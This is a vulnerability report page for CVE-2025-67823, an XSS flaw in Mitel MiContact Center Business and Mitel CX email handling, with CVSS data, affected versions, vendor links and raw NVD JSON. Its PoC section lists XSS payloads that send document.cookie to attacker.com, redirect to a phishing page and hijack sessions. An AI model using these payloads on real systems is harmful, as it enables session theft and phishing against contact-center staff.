Security Vulnerability Report
CVE-2025-67823 CVSS 8.2 HIGH

Published: 2026-01-15 22:16:11
Last Modified: 2026-01-23 19:38:47

Description

A vulnerability in the Multimedia Email component of Mitel MiContact Center Business through 10.2.0.10 and Mitel CX through 1.1.0.1 could allow an unauthenticated attacker to conduct a Cross-Site Scripting (XSS) attack due to insufficient input validation. A successful exploit requires user interaction where the email channel is enabled. This could allow an attacker to execute arbitrary scripts in the victim's browser or desktop client application.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mitel:cx:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mitel:micontact_center_business:*:*:*:*:*:*:*:* - VULNERABLE
Mitel MiContact Center Business < 10.2.0.11
Mitel MiContact Center Business <= 10.2.0.10
Mitel CX < 1.1.0.2
Mitel CX <= 1.1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-67823 XSS PoC - Mitel MiContact Center Business -->
<!-- Send malicious email to trigger XSS when viewed -->

<!-- Basic XSS Payload -->
<script>alert(document.cookie)</script>

<!-- Event Handler XSS Payload -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- SVG-based XSS Payload -->
<svg/onload=fetch('https://attacker.com/cookie='+btoa(document.cookie))>

<!-- Phishing Redirect Payload -->
<script>window.location.href='https://attacker.com/phishing?redirect='+window.location.href</script>

<!-- Session Hijacking Payload -->
<script>
var cookies = document.cookie;
fetch('https://attacker.com/api/log?data=' + encodeURIComponent(cookies));
</script>

<!-- Email Subject Field Injection -->
Subject: Important Update <img src=x onerror=alert('XSS')>

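References

https://www.mitel.com/support/security-advisories (Vendor Advisory)
https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0010 (Vendor Advisory)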

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67823", "sourceIdentifier": "[email protected]", "published": "2026-01-15T22:16:11.117", "lastModified": "2026-01-23T19:38:47.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Multimedia Email component of Mitel MiContact Center Business through 10.2.0.10 and Mitel CX through 1.1.0.1 could allow an unauthenticated attacker to conduct a Cross-Site Scripting (XSS) attack due to insufficient input validation. A successful exploit requires user interaction where the email channel is enabled. This could allow an attacker to execute arbitrary scripts in the victim's browser or desktop client application."}, {"lang": "es", "value": "Una vulnerabilidad en el componente de Correo Electrónico Multimedia de Mitel MiContact Center Business hasta la versión 10.2.0.10 y Mitel CX hasta la versión 1.1.0.1 podría permitir a un atacante no autenticado realizar un ataque de Cross-Site Scripting (XSS) debido a una validación de entrada insuficiente. Un exploit exitoso requiere interacción del usuario donde el canal de correo electrónico está habilitado. 
Esto podría permitir a un atacante ejecutar scripts arbitrarios en el navegador de la víctima o en la aplicación de cliente de escritorio."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mitel:cx:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0", "matchCriteriaId": "44861513-C99B-4840-86A0-FF1CC107DB32"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mitel:micontact_center_business:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.2.0.11", "matchCriteriaId": "F2ACED18-C47B-4220-A3CD-01454BE1E551"}]}]}], "references": [{"url": "https://www.mitel.com/support/security-advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0010", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}